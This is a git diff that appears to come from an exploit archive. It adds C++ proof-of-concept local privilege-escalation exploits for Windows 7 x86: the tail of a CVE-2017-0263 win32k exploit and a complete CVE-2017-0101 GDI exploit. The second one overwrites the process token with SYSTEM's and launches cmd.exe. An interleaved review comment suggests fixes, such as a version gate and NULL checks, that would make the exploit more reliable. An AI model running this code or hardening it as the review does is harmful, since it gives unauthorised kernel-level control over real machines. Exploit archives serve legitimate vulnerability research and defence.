+ 0xb8, 0x01, 0x00, 0x00, 0x00, // mov eax,1 + // Loader+0x112d: + 0xc9, // leave + 0xc2, 0x10, 0x00, // ret 10h +}; + +static +VOID +xxGetHMValidateHandle(VOID) +{ + HMODULE hModule = LoadLibraryA("USER32.DLL"); + PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); + PBYTE Address = NULL; + for (INT i = 0; i < 0x30; i++) + { + if (*(WORD *)(i + pfnIsMenu) != 0x02B2) + { + continue; + } + i += 2; + if (*(BYTE *)(i + pfnIsMenu) != 0xE8) + { + continue; + } + Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu; + Address = Address + i + 5; + pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, BYTE))Address; + break; + } +} + +#define TYPE_WINDOW 1 + +static +PVOID +xxHMValidateHandleEx(HWND hwnd) +{ + return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW); +} + +static +PVOID +xxHMValidateHandle(HWND hwnd) +{ + PVOID RetAddr = NULL; + if (!pfnHMValidateHandle) + { + xxGetHMValidateHandle(); + } + if (pfnHMValidateHandle) + { + RetAddr = xxHMValidateHandleEx(hwnd); + } + return RetAddr; +} + +static +ULONG_PTR +xxSyscall(UINT num, ULONG_PTR param1, ULONG_PTR param2) +{ + __asm { mov eax, num }; + __asm { int 2eh }; +} + +static +LRESULT +WINAPI +xxShadowWindowProc( + _In_ HWND hwnd, + _In_ UINT msg, + _In_ WPARAM wParam, + _In_ LPARAM lParam +) +{ + if (msg != WM_NCDESTROY || bDoneExploit) + { + return DefWindowProcW(hwnd, msg, wParam, lParam); + } + std::cout << "::" << __FUNCTION__ << std::endl; + POCDEBUG_BREAK(); + DWORD dwPopupFake[0xD] = { 0 }; + dwPopupFake[0x0] = (DWORD)0x00098208; //->flags + dwPopupFake[0x1] = (DWORD)pvHeadFake; //->spwndNotify + dwPopupFake[0x2] = (DWORD)pvHeadFake; //->spwndPopupMenu + dwPopupFake[0x3] = (DWORD)pvHeadFake; //->spwndNextPopup + dwPopupFake[0x4] = (DWORD)pvAddrFlags - 4; //->spwndPrevPopup + dwPopupFake[0x5] = (DWORD)pvHeadFake; //->spmenu + dwPopupFake[0x6] = (DWORD)pvHeadFake; //->spmenuAlternate + dwPopupFake[0x7] = (DWORD)pvHeadFake; //->spwndActivePopup + dwPopupFake[0x8] = (DWORD)0xFFFFFFFF; //->ppopupmenuRoot + 
dwPopupFake[0x9] = (DWORD)pvHeadFake; //->ppmDelayedFree + dwPopupFake[0xA] = (DWORD)0xFFFFFFFF; //->posSelectedItem + dwPopupFake[0xB] = (DWORD)pvHeadFake; //->posDropped + dwPopupFake[0xC] = (DWORD)0; + for (UINT i = 0; i < iWindowCount; ++i) + { + SetClassLongW(hWindowList[i], GCL_MENUNAME, (LONG)dwPopupFake); + } + xxSyscall(num_NtUserMNDragLeave, 0, 0); + LRESULT Triggered = SendMessageW(hWindowHunt, 0x9F9F, popupMenuRoot, 0); + bDoneExploit = Triggered == 0x9F9F; + return DefWindowProcW(hwnd, msg, wParam, lParam); +} + +#define MENUCLASS_NAME L"#32768" + +static +LRESULT +CALLBACK +xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam) +{ + tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam; + static HWND hwndMenuHit = 0; + static UINT iShadowCount = 0; + + if (bDoneExploit || iMenuCreated != num_PopupMenuCount - 2 || cwp->message != WM_NCCREATE) + { + return CallNextHookEx(0, code, wParam, lParam); + } + std::cout << "::" << __FUNCTION__ << std::endl; + WCHAR szTemp[0x20] = { 0 }; + GetClassNameW(cwp->hwnd, szTemp, 0x14); + if (!wcscmp(szTemp, L"SysShadow") && hwndMenuHit != NULL) + { + std::cout << "::iShadowCount=" << iShadowCount << std::endl; + POCDEBUG_BREAK(); + if (++iShadowCount == num_WndShadowCount) + { + SetWindowLongW(cwp->hwnd, GWL_WNDPROC, (LONG)xxShadowWindowProc); + } + else + { + SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_HIDEWINDOW); + SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_SHOWWINDOW); + } + } + else if (!wcscmp(szTemp, MENUCLASS_NAME)) + { + hwndMenuHit = cwp->hwnd; + std::cout << "::hwndMenuHit=" << hwndMenuHit << std::endl; + } + return CallNextHookEx(0, code, wParam, lParam); +} + +#define MN_ENDMENU 0x1F3 + +static +VOID +CALLBACK +xxWindowEventProc( + HWINEVENTHOOK hWinEventHook, + DWORD event, + HWND hwnd, + LONG idObject, + LONG idChild, + DWORD idEventThread, + DWORD dwmsEventTime +) +{ + UNREFERENCED_PARAMETER(hWinEventHook); + 
UNREFERENCED_PARAMETER(event); + UNREFERENCED_PARAMETER(idObject); + UNREFERENCED_PARAMETER(idChild); + UNREFERENCED_PARAMETER(idEventThread); + UNREFERENCED_PARAMETER(dwmsEventTime); + std::cout << "::" << __FUNCTION__ << std::endl; + if (iMenuCreated == 0) + { + popupMenuRoot = *(DWORD *)((PBYTE)xxHMValidateHandle(hwnd) + 0xb0); + } + if (++iMenuCreated >= num_PopupMenuCount) + { + std::cout << ">>SendMessage(MN_ENDMENU)" << std::endl; + POCDEBUG_BREAK(); + SendMessageW(hwnd, MN_ENDMENU, 0, 0); + } + else + { + std::cout << ">>SendMessage(WM_LBUTTONDOWN)" << std::endl; + POCDEBUG_BREAK(); + SendMessageW(hwnd, WM_LBUTTONDOWN, 1, 0x00020002); + } +} + +static +BOOL +xxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra) +{ + WNDCLASSEXW wndClass = { 0 }; + wndClass = { 0 }; + wndClass.cbSize = sizeof(WNDCLASSEXW); + wndClass.lpfnWndProc = DefWindowProcW; + wndClass.cbWndExtra = cbWndExtra; + wndClass.hInstance = GetModuleHandleA(NULL); + wndClass.lpszMenuName = NULL; + wndClass.lpszClassName = lpszClassName; + return RegisterClassExW(&wndClass); +} + +static +HWND +xxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle) +{ + return CreateWindowExW(dwExStyle, + lpszClassName, + NULL, + dwStyle, + 0, + 0, + 1, + 1, + NULL, + NULL, + GetModuleHandleA(NULL), + NULL); +} + +static +VOID xxCreateCmdLineProcess(VOID) +{ + STARTUPINFO si = { sizeof(si) }; + PROCESS_INFORMATION pi = { 0 }; + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_SHOW; + WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" }; + BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); + if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess); +} + +static +DWORD +WINAPI +xxTrackExploitEx(LPVOID lpThreadParameter) +{ + UNREFERENCED_PARAMETER(lpThreadParameter); + std::cout << "::" << __FUNCTION__ << std::endl; + POCDEBUG_BREAK(); + + for (INT i = 0; i < num_PopupMenuCount; i++) + { + MENUINFO mi = { 0 }; + hpopupMenu[i] 
= CreatePopupMenu(); + mi.cbSize = sizeof(mi); + mi.fMask = MIM_STYLE; + mi.dwStyle = MNS_AUTODISMISS | MNS_MODELESS | MNS_DRAGDROP; + SetMenuInfo(hpopupMenu[i], &mi); + } + for (INT i = 0; i < num_PopupMenuCount; i++) + { + LPCSTR szMenuItem = "item"; + AppendMenuA(hpopupMenu[i], + MF_BYPOSITION | MF_POPUP, + (i >= num_PopupMenuCount - 1) ? 0 : (UINT_PTR)hpopupMenu[i + 1], + szMenuItem); + } + + for (INT i = 0; i < 0x100; i++) + { + WNDCLASSEXW Class = { 0 }; + WCHAR szTemp[20] = { 0 }; + HWND hwnd = NULL; + wsprintfW(szTemp, L"%x-%d", rand(), i); + Class.cbSize = sizeof(WNDCLASSEXA); + Class.lpfnWndProc = DefWindowProcW; + Class.cbWndExtra = 0; + Class.hInstance = GetModuleHandleA(NULL); + Class.lpszMenuName = NULL; + Class.lpszClassName = szTemp; + if (!RegisterClassExW(&Class)) + { + continue; + } + hwnd = CreateWindowExW(0, szTemp, NULL, WS_OVERLAPPED, + 0, + 0, + 0, + 0, + NULL, + NULL, + GetModuleHandleA(NULL), + NULL); + if (hwnd == NULL) + { + continue; + } + hWindowList[iWindowCount++] = hwnd; + } + for (INT i = 0; i < iWindowCount; i++) + { + pvShellCode->tagCLS[i] = *(PVOID *)((PBYTE)xxHMValidateHandle(hWindowList[i]) + num_offset_WND_pcls); + } + + DWORD fOldProtect = 0; + VirtualProtect(pvShellCode, 0x1000, PAGE_EXECUTE_READ, &fOldProtect); + + xxRegisterWindowClassW(L"WNDCLASSMAIN", 0x000); + hWindowMain = xxCreateWindowExW(L"WNDCLASSMAIN", + WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST, + WS_VISIBLE); + xxRegisterWindowClassW(L"WNDCLASSHUNT", 0x200); + hWindowHunt = xxCreateWindowExW(L"WNDCLASSHUNT", + WS_EX_LEFT, + WS_OVERLAPPED); + PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt); + PBYTE pbExtra = head->deskhead.pSelf + 0xb0 + 4; + pvHeadFake = pbExtra + 0x44; + for (UINT x = 0; x < 0x7F; x++) + { + SetWindowLongW(hWindowHunt, sizeof(DWORD) * (x + 1), (LONG)pbExtra); + } + PVOID pti = head->thread.pti; + SetWindowLongW(hWindowHunt, 0x28, 0); + SetWindowLongW(hWindowHunt, 0x50, (LONG)pti); // pti + SetWindowLongW(hWindowHunt, 
0x6C, 0); + SetWindowLongW(hWindowHunt, 0x1F8, 0xC033C033); + SetWindowLongW(hWindowHunt, 0x1FC, 0xFFFFFFFF); + + pvAddrFlags = *(PBYTE *)((PBYTE)xxHMValidateHandle(hWindowHunt) + 0x10) + 0x16; + + SetWindowLongW(hWindowHunt, GWL_WNDPROC, (LONG)pvShellCode->pfnWindProc); + + SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc, + GetModuleHandleA(NULL), + GetCurrentThreadId()); + + SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, + GetModuleHandleA(NULL), + xxWindowEventProc, + GetCurrentProcessId(), + GetCurrentThreadId(), + 0); + + TrackPopupMenuEx(hpopupMenu[0], 0, 0, 0, hWindowMain, NULL); + + MSG msg = { 0 }; + while (GetMessageW(&msg, NULL, 0, 0)) + { + TranslateMessage(&msg); + DispatchMessageW(&msg); + } + return 0; +} + +INT POC_CVE20170263(VOID) +{ + std::cout << "-------------------" << std::endl; + std::cout << "POC - CVE-2017-0263" << std::endl; + std::cout << "-------------------" << std::endl; + + pvShellCode = (PSHELLCODE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (pvShellCode == NULL) + { + return 0; + } + ZeroMemory(pvShellCode, 0x1000); + pvShellCode->pid = GetCurrentProcessId(); + pvShellCode->off_CLS_lpszMenuName = 0x050; + pvShellCode->off_THREADINFO_ppi = 0x0b8; + pvShellCode->off_EPROCESS_ActiveLink = 0x0b8; + pvShellCode->off_EPROCESS_Token = 0x0f8; + CopyMemory(pvShellCode->pfnWindProc, xxPayloadWindProc, sizeof(xxPayloadWindProc)); + + std::cout << "CREATE WORKER THREAD..." << std::endl; + POCDEBUG_BREAK(); + HANDLE hThread = CreateThread(NULL, 0, xxTrackExploitEx, NULL, 0, NULL); + if (hThread == NULL) + { + return FALSE; + } + while (!bDoneExploit) + { + Sleep(500); + } + xxCreateCmdLineProcess(); + DestroyWindow(hWindowMain); + TerminateThread(hThread, 0); + std::cout << "-------------------" << std::endl; + getchar(); + return bDoneExploit; +} + +INT main(INT argc, CHAR *argv[]) +{ + POC_CVE20170263(); + return 0; +} \ No newline at end of file 
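Review bot: Every kernel offset the payload relies on — `off_CLS_lpszMenuName = 0x050`, `off_THREADINFO_ppi` and `off_EPROCESS_ActiveLink = 0x0b8`, `off_EPROCESS_Token = 0x0f8`, the `num_NtUserMNDragLeave = 0x11EC` syscall number and the `0x64`/`0xb0` tagWND field offsets — is specific to the Windows 7 x86 build named in the title, yet nothing in `POC_CVE20170263` checks the OS version before the `int 2eh` syscall and the kernel-mode writes, so on any other build the result is kernel memory corruption (BSOD) rather than a clean failure; add a version gate at the top of `POC_CVE20170263` (e.g. `RtlGetVersion` with major 6 / minor 1) and a comment above the offset table naming the build and service pack they were taken from, which the file does not record. `xxHMValidateHandle` returns NULL when the `IsMenu` signature scan in `xxGetHMValidateHandle` fails, and both `xxWindowEventProc` (`+ 0xb0`) and `xxTrackExploitEx` (`head->deskhead.pSelf`) dereference the result without a check; bail out with a message when it is NULL. `xxSyscall` is declared to return `ULONG_PTR` but contains no `return` statement and only works because MSVC leaves the syscall result in EAX — make that explicit with `ULONG_PTR ret; __asm { mov ret, eax }; return ret;`. The trailing `TerminateThread(hThread, 0)` on the worker that is still inside a menu loop is also worth a comment acknowledging it leaks the thread's resources deliberately.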
diff --git a/exploits/windows_x86/local/44479.cpp b/exploits/windows_x86/local/44479.cpp
new file mode 100644
index 000000000..9543896cc
--- /dev/null
+++ b/exploits/windows_x86/local/44479.cpp
@@ -0,0 +1,666 @@ +#include +#include +#include +#include +#pragma comment(lib, "psapi.lib") + +#define POCDEBUG 0 + +#if POCDEBUG == 1 +#define POCDEBUG_BREAK() getchar() +#elif POCDEBUG == 2 +#define POCDEBUG_BREAK() DebugBreak() +#else +#define POCDEBUG_BREAK() +#endif + +CONST LONG maxTimes = 2000; +CONST LONG tmpTimes = 3000; +static HBITMAP hbitmap[maxTimes] = { NULL }; +static HPALETTE hpalette[maxTimes] = { NULL }; + +static DWORD iMemHunted = NULL; +static HBITMAP hBmpHunted = NULL; +static PDWORD pBmpHunted = NULL; +static HPALETTE hPalExtend = NULL; + +CONST LONG iExtPaleHmgr = 809; +CONST LONG iExtcEntries = 814; +CONST LONG iExtPalColor = 828; + +typedef struct _PATRECT { + INT nXLeft; + INT nYLeft; + INT nWidth; + INT nHeight; + HBRUSH hBrush; +} PATRECT, *PPATRECT; + +typedef BOOL (WINAPI *pfPolyPatBlt)(HDC hdc, DWORD rop, PPATRECT pPoly, DWORD Count, DWORD Mode); + +static +BOOL xxCreateBitmaps(INT nWidth, INT Height, UINT nbitCount) +{ + POCDEBUG_BREAK(); + for (LONG i = 0; i < maxTimes; i++) + { + hbitmap[i] = CreateBitmap(nWidth, Height, 1, nbitCount, NULL); + if (hbitmap[i] == NULL) + { + return FALSE; + } + } + return TRUE; +} + +static +BOOL xxDeleteBitmaps(VOID) +{ + BOOL bReturn = FALSE; + POCDEBUG_BREAK(); + for (LONG i = 0; i < maxTimes; i++) + { + bReturn = DeleteObject(hbitmap[i]); + hbitmap[i] = NULL; + } + return bReturn; +} + +static +BOOL xxRegisterWndClasses(LPCSTR menuName) +{ + POCDEBUG_BREAK(); + CHAR buf[0x10] = { 0 }; + for (LONG i = 0; i < tmpTimes; i++) + { + WNDCLASSEXA Class = { 0 }; + sprintf(buf, "CLS_%d", i); + Class.lpfnWndProc = DefWindowProcA; + Class.lpszClassName = buf; + Class.lpszMenuName = menuName; + Class.cbSize = sizeof(WNDCLASSEXA); + if (!RegisterClassExA(&Class)) + { + return FALSE; + } + } + return TRUE; +} + +static +BOOL xxDigHoleInWndClasses(LONG b, LONG e) +{ + BOOL bReturn = FALSE; + CHAR buf[0x10] = { 0 }; + for (LONG i = b; i < e; i++) + { + sprintf(buf, "CLS_%d", i); + bReturn = 
UnregisterClassA(buf, NULL); + } + return bReturn; +} + +static +BOOL xxUnregisterWndClasses(VOID) +{ + BOOL bReturn = FALSE; + CHAR buf[0x10] = { 0 }; + for (LONG i = 0; i < tmpTimes; i++) + { + sprintf(buf, "CLS_%d", i); + bReturn = UnregisterClassA(buf, NULL); + } + return bReturn; +} + +static +BOOL xxCreatePalettes(ULONG cEntries) +{ + BOOL bReturn = FALSE; + POCDEBUG_BREAK(); + PLOGPALETTE pal = NULL; + // 0x64*4+0x58+8=0x1f0 + pal = (PLOGPALETTE)malloc(sizeof(LOGPALETTE) + cEntries * sizeof(PALETTEENTRY)); + pal->palVersion = 0x300; + pal->palNumEntries = cEntries; + for (LONG i = 0; i < maxTimes; i++) + { + hpalette[i] = CreatePalette(pal); + if (hpalette[i] == NULL) + { + bReturn = FALSE; + break; + } + bReturn = TRUE; + } + free(pal); + return bReturn; +} + +static +BOOL xxDeletePalettes(VOID) +{ + BOOL bReturn = FALSE; + POCDEBUG_BREAK(); + for (LONG i = 0; i < maxTimes; i++) + { + bReturn = DeleteObject(hpalette[i]); + hpalette[i] = NULL; + } + return bReturn; +} + +static +BOOL xxRetrieveBitmapBits(VOID) +{ + pBmpHunted = static_cast(malloc(0x1000)); + ZeroMemory(pBmpHunted, 0x1000); + LONG index = -1; + LONG iLeng = -1; + POCDEBUG_BREAK(); + for (LONG i = 0; i < maxTimes; i++) + { + iLeng = GetBitmapBits(hbitmap[i], 0x1000, pBmpHunted); + if (iLeng < 0xCA0) + { + continue; + } + index = i; + std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl; + hBmpHunted = hbitmap[i]; + break; + } + if (index == -1) + { + std::cout << "FAILED: " << (PVOID)(-1) << std::endl; + return FALSE; + } + return TRUE; +} + +static +VOID xxOutputBitmapBits(VOID) +{ + POCDEBUG_BREAK(); + for (LONG i = 0; i < 0x1000 / sizeof(DWORD); i++) + { + std::cout << '['; + std::cout.fill('0'); + std::cout.width(4); + std::cout << i << ']' << (PVOID)pBmpHunted[i]; + if (((i + 1) % 4) != 0) + { + std::cout << " "; + } + else + { + std::cout << std::endl; + } + } + std::cout.width(0); +} + +static +BOOL xxGetExtendPalette(HPALETTE hHandle) +{ + LONG index = -1; + 
POCDEBUG_BREAK(); + for (LONG i = 0; i < maxTimes; i++) + { + if (hpalette[i] != hHandle) + { + continue; + } + index = i; + std::cout << "LOCATE: " << '[' << i << ']' << hpalette[i] << std::endl; + hPalExtend = hpalette[i]; + break; + } + if (index == -1) + { + std::cout << "FAILED: " << (PVOID)(-1) << std::endl; + return FALSE; + } + return TRUE; +} + +static +BOOL xxPoint(LONG id, DWORD Value) +{ + LONG iLeng = 0x00; + pBmpHunted[id] = Value; + iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted); + if (iLeng < 0xD00) + { + return FALSE; + } + return TRUE; +} + +static +BOOL xxPointToHit(LONG addr, PVOID pvBits, DWORD cb) +{ + UINT iLeng = 0; + pBmpHunted[iExtPalColor] = addr; + iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted); + if (iLeng < 0xD00) + { + return FALSE; + } + PVOID pvTable = NULL; + UINT cbSize = (cb + 3) & ~3; // sizeof(PALETTEENTRY) => 4 + pvTable = malloc(cbSize); + memcpy(pvTable, pvBits, cb); + iLeng = SetPaletteEntries(hPalExtend, 0, cbSize / 4, (PPALETTEENTRY)pvTable); + free(pvTable); + if (iLeng < cbSize / 4) + { + return FALSE; + } + return TRUE; +} + +static +BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb) +{ + BOOL iLeng = 0; + pBmpHunted[iExtPalColor] = addr; + iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted); + if (iLeng < 0xD00) + { + return FALSE; + } + PVOID pvTable = NULL; + UINT cbSize = (cb + 3) & ~3; // sizeof(PALETTEENTRY) => 4 + pvTable = malloc(cbSize); + iLeng = GetPaletteEntries(hPalExtend, 0, cbSize / 4, (PPALETTEENTRY)pvTable); + memcpy(pvBits, pvTable, cb); + free(pvTable); + if (iLeng < cbSize / 4) + { + return FALSE; + } + return TRUE; +} + +static +BOOL xxFixHuntedPoolHeader(VOID) +{ + DWORD szInputBit[0x100] = { 0 }; + CONST LONG iTrueBmpHead = 937; + szInputBit[0] = pBmpHunted[iTrueBmpHead + 0]; + szInputBit[1] = pBmpHunted[iTrueBmpHead + 1]; + BOOL bReturn = FALSE; + bReturn = xxPointToHit(iMemHunted + 0x000, szInputBit, 0x08); + if (!bReturn) + { + return FALSE; + } + return TRUE; +} + +static +BOOL 
xxFixHuntedBitmapObject(VOID) +{ + DWORD szInputBit[0x100] = { 0 }; + szInputBit[0] = (DWORD)hBmpHunted; + BOOL bReturn = FALSE; + bReturn = xxPointToHit(iMemHunted + 0x08, szInputBit, 0x04); + if (!bReturn) + { + return FALSE; + } + bReturn = xxPointToHit(iMemHunted + 0x1c, szInputBit, 0x04); + if (!bReturn) + { + return FALSE; + } + return TRUE; +} + +static +DWORD_PTR +xxGetNtoskrnlAddress(VOID) +{ + DWORD_PTR AddrList[500] = { 0 }; + DWORD cbNeeded = 0; + EnumDeviceDrivers((LPVOID *)&AddrList, sizeof(AddrList), &cbNeeded); + return AddrList[0]; +} + +static +DWORD_PTR +xxGetSysPROCESS(VOID) +{ + DWORD_PTR Module = 0x00; + DWORD_PTR NtAddr = 0x00; + Module = (DWORD_PTR)LoadLibraryA("ntkrnlpa.exe"); + NtAddr = (DWORD_PTR)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess"); + FreeLibrary((HMODULE)Module); + NtAddr = NtAddr - Module; + Module = xxGetNtoskrnlAddress(); + if (Module == 0x00) + { + return 0x00; + } + NtAddr = NtAddr + Module; + if (!xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR))) + { + return 0x00; + } + return NtAddr; +} + +CONST LONG off_EPROCESS_UniqueProId = 0x0b4; +CONST LONG off_EPROCESS_ActiveLinks = 0x0b8; + +static +DWORD_PTR +xxGetTarPROCESS(DWORD_PTR SysPROC) +{ + if (SysPROC == 0x00) + { + return 0x00; + } + DWORD_PTR point = SysPROC; + DWORD_PTR value = 0x00; + do + { + value = 0x00; + xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR)); + if (value == 0x00) + { + break; + } + if (value == GetCurrentProcessId()) + { + return point; + } + value = 0x00; + xxPointToGet(point + off_EPROCESS_ActiveLinks, &value, sizeof(DWORD_PTR)); + if (value == 0x00) + { + break; + } + point = value - off_EPROCESS_ActiveLinks; + if (point == SysPROC) + { + break; + } + } while (TRUE); + return 0x00; +} + +CONST LONG off_EPROCESS_Token = 0x0f8; +static DWORD_PTR dstToken = 0x00; +static DWORD_PTR srcToken = 0x00; + +static +BOOL +xxModifyTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC) +{ + if (dstPROC == 0x00 || srcPROC == 
0x00) + { + return FALSE; + } + // get target process original token pointer + xxPointToGet(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR)); + if (dstToken == 0x00) + { + return FALSE; + } + // get system process token pointer + xxPointToGet(srcPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR)); + if (srcToken == 0x00) + { + return FALSE; + } + // modify target process token pointer to system + xxPointToHit(dstPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR)); + // just test if the modification is successful + DWORD_PTR tmpToken = 0x00; + xxPointToGet(dstPROC + off_EPROCESS_Token, &tmpToken, sizeof(DWORD_PTR)); + if (tmpToken != srcToken) + { + return FALSE; + } + return TRUE; +} + +static +BOOL +xxRecoverTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC) +{ + if (dstPROC == 0x00 || srcPROC == 0x00) + { + return FALSE; + } + if (dstToken == 0x00 || srcToken == 0x00) + { + return FALSE; + } + // recover the original token pointer to target process + xxPointToHit(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR)); + return TRUE; +} + +static +VOID xxCreateCmdLineProcess(VOID) +{ + STARTUPINFO si = { sizeof(si) }; + PROCESS_INFORMATION pi = { 0 }; + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_SHOW; + WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" }; + BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); + if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess); +} + +static +VOID xxPrivilegeElevation(VOID) +{ + BOOL bReturn = FALSE; + do + { + DWORD SysPROC = 0x0; + DWORD TarPROC = 0x0; + POCDEBUG_BREAK(); + SysPROC = xxGetSysPROCESS(); + if (SysPROC == 0x00) + { + break; + } + std::cout << "SYSTEM PROCESS: " << (PVOID)SysPROC << std::endl; + POCDEBUG_BREAK(); + TarPROC = xxGetTarPROCESS(SysPROC); + if (TarPROC == 0x00) + { + break; + } + std::cout << "TARGET PROCESS: " << (PVOID)TarPROC << std::endl; + POCDEBUG_BREAK(); + bReturn = xxModifyTokenPointer(TarPROC, 
SysPROC); + if (!bReturn) + { + break; + } + std::cout << "MODIFIED TOKEN TO SYSTEM!" << std::endl; + std::cout << "CREATE NEW CMDLINE PROCESS..." << std::endl; + POCDEBUG_BREAK(); + xxCreateCmdLineProcess(); + POCDEBUG_BREAK(); + std::cout << "RECOVER TOKEN..." << std::endl; + bReturn = xxRecoverTokenPointer(TarPROC, SysPROC); + if (!bReturn) + { + break; + } + bReturn = TRUE; + } while (FALSE); + if (!bReturn) + { + std::cout << "FAILED" << std::endl; + } +} + +INT POC_CVE20170101(VOID) +{ + std::cout << "-------------------" << std::endl; + std::cout << "POC - CVE-2017-0101" << std::endl; + std::cout << "-------------------" << std::endl; + + BOOL bReturn = FALSE; + HDC hdc = NULL; + HBITMAP hbmp = NULL; + HBRUSH hbru = NULL; + pfPolyPatBlt pfnPolyPatBlt = NULL; + do + { + hdc = GetDC(NULL); + std::cout << "GET DEVICE CONTEXT: " << hdc << std::endl; + if (hdc == NULL) + { + break; + } + + std::cout << "CREATE PATTERN BRUSH BITMAP..." << std::endl; + hbmp = CreateBitmap(0x36D, 0x12AE8F, 1, 1, NULL); + if (hbmp == NULL) + { + break; + } + + std::cout << "CREATE PATTERN BRUSH..." << std::endl; + hbru = CreatePatternBrush(hbmp); + if (hbru == NULL) + { + break; + } + + std::cout << "CREATE BITMAPS (1)..." << std::endl; + bReturn = xxCreateBitmaps(0xE8C, 1, 8); + if (!bReturn) + { + break; + } + + std::cout << "REGISTER WINDOW CLASSES..." << std::endl; + bReturn = xxRegisterWndClasses("KCUF"); + if (!bReturn) + { + break; + } + + std::cout << "DELETE BITMAPS (1)..." << std::endl; + xxDeleteBitmaps(); + + std::cout << "CREATE BITMAPS (2)..." << std::endl; + bReturn = xxCreateBitmaps(0xC98, 1, 8); + if (!bReturn) + { + break; + } + + std::cout << "CREATE PALETTES (1)..." << std::endl; + bReturn = xxCreatePalettes(0x64); + if (!bReturn) + { + break; + } + + std::cout << "UNREGISTER WINDOW CLASSES (H)..." << std::endl; + xxDigHoleInWndClasses(1000, 2000); + + std::cout << "POLYPATBLT..." 
<< std::endl; + POCDEBUG_BREAK(); + pfnPolyPatBlt = (pfPolyPatBlt)GetProcAddress(GetModuleHandleA("gdi32"), "PolyPatBlt"); + if (pfnPolyPatBlt == NULL) + { + break; + } + PATRECT ppb[1] = { 0 }; + ppb[0].nXLeft = 0x100; + ppb[0].nYLeft = 0x100; + ppb[0].nWidth = 0x100; + ppb[0].nHeight = 0x100; + ppb[0].hBrush = hbru; + pfnPolyPatBlt(hdc, PATCOPY, ppb, 1, 0); + + std::cout << "LOCATE HUNTED BITMAP..." << std::endl; + bReturn = xxRetrieveBitmapBits(); + if (!bReturn) + { + break; + } + + // std::cout << "OUTPUT BITMAP BITS..." << std::endl; + // xxOutputBitmapBits(); + + std::cout << "LOCATE EXTEND PALETTE..." << std::endl; + bReturn = xxGetExtendPalette((HPALETTE)pBmpHunted[iExtPaleHmgr]); + if (!bReturn) + { + break; + } + + if ((pBmpHunted[iExtcEntries]) != 0x64 || + (pBmpHunted[iExtPalColor] & 0xFFF) != 0x00000E54) + { + bReturn = FALSE; + std::cout << "FAILED: " << (PVOID)pBmpHunted[iExtPalColor] << std::endl; + break; + } + iMemHunted = (pBmpHunted[iExtPalColor] & ~0xFFF); + std::cout << "HUNTED PAGE: " << (PVOID)iMemHunted << std::endl; + std::cout << "FIX HUNTED POOL HEADER..." << std::endl; + bReturn = xxFixHuntedPoolHeader(); + if (!bReturn) + { + break; + } + + std::cout << "FIX HUNTED BITMAP OBJECT..." << std::endl; + bReturn = xxFixHuntedBitmapObject(); + if (!bReturn) + { + break; + } + + std::cout << "-------------------" << std::endl; + std::cout << "PRIVILEGE ELEVATION" << std::endl; + std::cout << "-------------------" << std::endl; + xxPrivilegeElevation(); + std::cout << "-------------------" << std::endl; + + std::cout << "DELETE BITMAPS (2)..." << std::endl; + xxDeleteBitmaps(); + + std::cout << "DELETE PALETTES (1)..." << std::endl; + xxDeletePalettes(); + + bReturn = TRUE; + } while (FALSE); + + if (bReturn == FALSE) + { + std::cout << GetLastError() << std::endl; + } + + POCDEBUG_BREAK(); + std::cout << "DELETE BRUSH..." << std::endl; + DeleteObject(hbru); + DeleteObject(hbmp); + + std::cout << "UNREGISTER WINDOW CLASSES (1)..." 
<< std::endl;
+ xxUnregisterWndClasses();
+
+ std::cout << "-------------------" << std::endl;
+ getchar();
+ return 0;
+}
+
+INT main(INT argc, CHAR *argv[])
+{
+ POC_CVE20170101();
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows_x86/local/44480.cpp b/exploits/windows_x86/local/44480.cpp
new file mode 100644
index 000000000..76c9a13a7
--- /dev/null
+++ b/exploits/windows_x86/local/44480.cpp
